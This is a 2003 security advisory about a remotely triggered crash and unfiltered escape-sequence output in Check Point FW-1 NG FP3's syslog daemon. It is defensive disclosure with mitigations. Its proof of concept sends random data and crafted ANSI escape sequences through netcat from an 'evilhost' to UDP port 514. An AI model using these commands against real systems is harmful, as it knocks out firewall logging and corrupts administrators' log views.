22th Mar 2003 [SBWID-6087]
COMMAND
	Check Point DoS attack against syslog daemon
SYSTEMS AFFECTED
	Check Point FW-1 NG FP3 & FP3 HF1
PROBLEM
	Thanks to Peter of (P) &  (C)  2003  AERAsec  Network  Services  and
	Security GmbH, advisory :
	
	 http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
	 http://www.aerasec.de/security/index.html?id=3Dae-200303-064
	
	--snip--
	* Successful DoS from remote against syslog daemon of Check  Point  FW-1
	NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
	* Syslog message containing escape sequences directed to  syslog  daemon
	of Check Point FW-1 NG FP3 (including HF1  and  HF2)  remain  unfiltered
	and cause strange output behaviour if the log is viewed on console.
	--snip--
	Check Point VPN-1/FW-1 NG FP3 contains a syslog  daemon  (default:  off)
	to redirect incoming syslog  messages  from  remote  (e.g.  routers)  to
	Check Point's SmartTracker logging mechanism. This syslog daemon can  be
	crashed from remote and it will not start again  auotmatically.  Neither
	a watchdog service is detecting the crash nor an entry in the  SmartView
	Tracker about a no longer available syslog daemon appears.
	Additionally it will print all chars received in a syslog  message  from
	remote without any modifications. This means, escape sequences  are  not
	filtered or e.g. expanded to their octal values in ASCII.
	--snip--
	 Proof of concept
	 ================
	 1
	 =
	Start syslog  daemon  by  enabling  in  the  firewall  object  (and  run
	cpstop/cpstart afterwards) or by hand executing:
	
	[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
	Shutting down kernel logger:                               [  OK  ]
	Shutting down system logger:                               [  OK  ]
	Starting system logger:                                    [  OK  ]
	Starting kernel logger:                                    [  OK  ]
	
	Segmentation fault <- caused after receiving random  syslog  payload,
	see below
	Check for listening syslog daemon:
	
	 [firewall]# netstat -lnptu |grep -w 514
	 udp     0    0 0.0.0.0:514          0.0.0.0:*    $pid/syslog
	
	Note also that this daemon is running as "root":
	
	 # ps -ux | grep -w syslog
	 root      $pid  0.0  6.8 148064 8612 ?       S    12:17   0:00 syslog 514 all
	
	Send a valid syslog message from  a  remote  host  (here  also  a  Linux
	system):
	
	 [evilhost]# echo  "<189>19: 00:01:04: Test" | nc -u firewall 514
	
	Send random payload via syslog message from a remote host:
	
	 [evilhost]# cat /dev/urandom | nc -u firewall 514
	
	The previous started syslog daemon should crash after  short  time,  use
	"netstat" to see whether a daemon is still listening on UDP port 514
	Note: for a clean restart of Check Point's syslog  daemon  the  firewall
	service needs to be restarted.
	 2
	 =
	Enable receiving of syslog from  remote  by  FW-1  like  e.g.  described
	above.
	View log on console by running following command:
	
	 [firewall]# fw lot -nfnl
	
	Send some special escape sequences via syslog, e.g.
	
	[evilhost]# echo -e "<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31mHACKER~ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
	
	Take a look at the console again, but  don't  be  scared  too  much  for
	now... Press CTRL-C and reset the console to standard by executing:
	
	 [firewall]# reset
	
	Attackers might send a lot of "special" escape sequences, for  Linux  as
	destination see "man console_codes" for more.
	Note: standard syslog daemon on a RHL 7.3 system treats code  like  this
	as shown here:
	
	Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
	
SOLUTION
	Solutions to prevent the successful DoS attack against syslog service:
	- Upgrade to FP3 HF2 as soon  as  possible,  see  for  more  information
	(available since 14 March 2003) :
	
	 http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html 
	
	- Customize your ruleset and accept syslog messages only from  dedicated
	(and trusted, see below) senders by the enforcement module
	Solutions to prevent unfiltered console output:
	- Filter log output by using "tr" like:
	
	 [firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
	
	(all chars with ASCII codes from from decimal 0-31  and  128-255  except
	10 for LF are replaced by a '*')
	- Update Check Point's syslog daemon to newer version once  again,  when
	available :
	
	 http://www.checkpoint.com/techsupport/alerts/syslog.html
	
	- Improve ruleset like suggested above.